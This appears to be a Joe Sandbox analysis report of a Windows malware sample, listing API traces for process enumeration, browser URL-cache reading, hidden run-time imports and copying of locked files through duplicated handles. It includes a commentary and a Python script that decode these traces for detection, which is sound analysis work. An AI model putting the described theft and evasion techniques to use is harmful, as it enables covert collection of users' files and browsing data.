                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                • API String ID: 3849927982-2252543386
                                                                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                 Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                 Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                • API String ID: 1344430650-1740548384
                                                                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                • String ID: bhv
                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                 Control-flow Graph (function 00413F4F-00413FA5; the interactive graph and its executed/not-executed colouring are not reproduced here)
                                                                                                                                                 • 413F54: call 0040A804 → 413F5F: GetProcAddress × 5 → 413FA5: return
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
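Taken together, the entries above read as three building blocks once their constant arguments are decoded: the function at 00413D4C walks the process list with a TH32CS_SNAPPROCESS snapshot and opens each process with 0x410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), resolving QueryFullProcessImageNameW by name; the function around 0040E093 calls NtQuerySystemInformation with class 0x10 (SystemHandleInformation), opens the owning process with 0x40 (PROCESS_DUP_HANDLE), duplicates the handle, maps the file read-only and writes it out to a GetTempFileNameW path, a common way to copy a file that another process holds open; and the function at 00413F4F resolves psapi.dll exports by name so they never appear in the import table. The script below is an added example and is not code from the Joe Sandbox report or from the sample: it parses API lines in the format printed above, decodes the masks with the public Win32 constants, lists the names resolved through GetProcAddress, and emits a note for each of the two behaviour patterns. The sample input is constructed from lines copied from these entries. One caveat: Joe Sandbox recovers argument values from the stack at call time, so a "?" is an unrecovered value, and a decoded mask should be confirmed in the disassembly before it is turned into a detection rule.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Added example, not code from the Joe Sandbox report or from the sample. Constant
# tables are public Win32 SDK values; argument positions follow the documented prototypes.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>[\w?@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8}))?\s*$")
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE"}
SNAPSHOT_FLAGS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
                  0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS",
               5: "TRUNCATE_EXISTING"}
SYSINFO_CLASS = {0x10: "SystemHandleInformation"}  # the class subcall 0040DD85 queries


class ApiCall(NamedTuple):
    api: str
    args: List[str]
    ref: Optional[str]

    def arg(self, i: int) -> Optional[int]:
        try:  # hex stack value -> int; "?" and strings such as kernel32.dll -> None
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return ApiCall(m.group("api"), args, m.group("ref"))


def _bits(value: Optional[int], table: Dict[int, str]) -> str:
    # Expand a mask into named flags; unrecognised bits stay as hex so nothing is dropped.
    if value is None:
        return "?"
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"


def decode(c: ApiCall) -> str:
    """Decode the argument(s) that show what a call is for; "" when there is nothing to decode."""
    if c.api == "OpenProcess":
        return "access=" + _bits(c.arg(0), PROCESS_RIGHTS)
    if c.api == "CreateToolhelp32Snapshot":
        return "flags=" + _bits(c.arg(0), SNAPSHOT_FLAGS)
    if c.api in ("CreateFileW", "CreateFileA"):
        d = c.arg(4)
        return (f"access={_bits(c.arg(1), GENERIC_ACCESS)} share={_bits(c.arg(2), SHARE_MODE)}"
                f" disposition={DISPOSITION.get(d, '?' if d is None else hex(d))}")
    if c.api == "NtQuerySystemInformation":
        k = c.arg(0)
        return "class=" + SYSINFO_CLASS.get(k, "?" if k is None else hex(k))
    return ""


def summarize(report_text: str) -> Dict[str, List[str]]:
    """DLL names and GetProcAddress export names (imports resolved at run time, invisible to a
    static import-table scan) plus one note per behaviour pattern the entries above combine to."""
    calls = list(filter(None, map(parse_api_line, report_text.splitlines())))
    out: Dict[str, List[str]] = {"libraries": [], "exports": [], "notes": []}
    for c in calls:
        for a in c.args:
            if a.lower().endswith(".dll") and a not in out["libraries"]:
                out["libraries"].append(a)
        if c.api.startswith("GetProcAddress") and len(c.args) > 1 and c.arg(1) is None:
            if c.args[1] != "?" and not c.args[1].lower().endswith(".dll"):
                out["exports"].append(c.args[1])  # lpProcName, the second parameter
    seen = {c.api for c in calls}
    if "OpenProcess" in seen and any("TH32CS_SNAPPROCESS" in decode(c) for c in calls):
        rights = sorted({decode(c) for c in calls if c.api == "OpenProcess"})
        out["notes"].append("process enumeration, OpenProcess " + ", ".join(rights))
    if {"NtQuerySystemInformation", "DuplicateHandle", "MapViewOfFile", "WriteFile"} <= seen:
        out["notes"].append("locked-file copy via duplicated handle and file mapping")
    return out


# Constructed input: API lines copied from the entries above.
SAMPLE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
"""

if __name__ == "__main__":
    for c in filter(None, map(parse_api_line, SAMPLE.splitlines())):
        print(f"{c.ref} {c.api:<26} {decode(c)}")
    print(summarize(SAMPLE))
```

`summarize` works on any slice of the report pasted in place of `SAMPLE`. The decode tables cover only the calls these entries use and `decode` returns an empty string for everything else, so a blank means "not decoded", not "benign"; extend the tables before relying on the output for other entries.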

                                                                                                                                                 Control-flow Graph (function 004466F4-004468DD, the CRT start-up stub; the interactive graph and its executed/not-executed colouring are not reproduced here)
                                                                                                                                                 • 4466F4: call 00446904, GetModuleHandleA → 44675B: __set_app_type, __p__fmode, __p__commode, call 004153F2 → 4467AC: __setusermatherr → 4467B8: call 004468F0, _initterm, __wgetmainargs, _initterm → 446853: GetStartupInfoW → 44687C: GetModuleHandleA, call 0041276D → 446896: exit or 44689D: _cexit → 4468D8: call 0044693D
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                • String ID: visited:
                                                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                 Control-flow Graph (function 0040E175-0040E2A8; the interactive graph and its executed/not-executed colouring are not reproduced here)
                                                                                                                                                 • 40E175: call 0040695D, call 00406B90 → 40E1A7: memset → 40E1E8 (loop head): call 00406E8F → 40E1FC: call 0040DD50 × 2 → 40E21F: call 0040742E → 40E237: call 0040AAE3 → 40E244: _snwprintf, call 0040A8D0 → 40E270: call 00406B53 → back to 40E1E8
                                                                                                                                                 • 40E283: free or call 0040AA04 → 40E299: call 004069A3, return
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph (not rendered in this extraction)
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (basic blocks listed as "id address-range: calls -> successor blocks"; the executed/not-executed colouring of the rendered graph is not reproduced here)
• 847 41837f-4183bf: -> 848, 849
• 848 4183c1-4183cc: call 418197 -> 854, 855
• 849 4183dc-4183ec: call 418160 -> 856, 857
• 854 4183d2-4183d8: -> 849
• 855 418517-41851d
• 856 4183f6-41840b: -> 858, 859
• 857 4183ee-4183f1: -> 855
• 858 418417-418423: -> 860
• 859 41840d-418415: -> 860
• 860 418427-418442: call 41739b -> 863, 864
• 863 418444-41845d: CreateFileW -> 865
• 864 41845f-418475: CreateFileA -> 865
• 865 418477-41847c: -> 866, 867
• 866 4184c2-4184c7: -> 870, 871
• 867 41847e-418495: GetLastError, free -> 868, 869
• 868 4184b5-4184c0: call 444706 -> 855
• 869 418497-4184b3: call 41837f (the function itself, reached from the GetLastError branch) -> 855
• 870 4184d5-418501: memset, call 418758 -> 877
• 871 4184c9-4184d3: -> 870
• 877 418506-418515: free -> 855
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Control-flow Graph (not rendered in this extraction)
APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
